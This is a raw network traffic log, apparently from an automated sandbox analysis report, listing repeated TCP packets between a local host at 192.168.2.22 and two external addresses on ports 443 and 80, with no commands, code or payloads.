          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 5.45.108.48:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
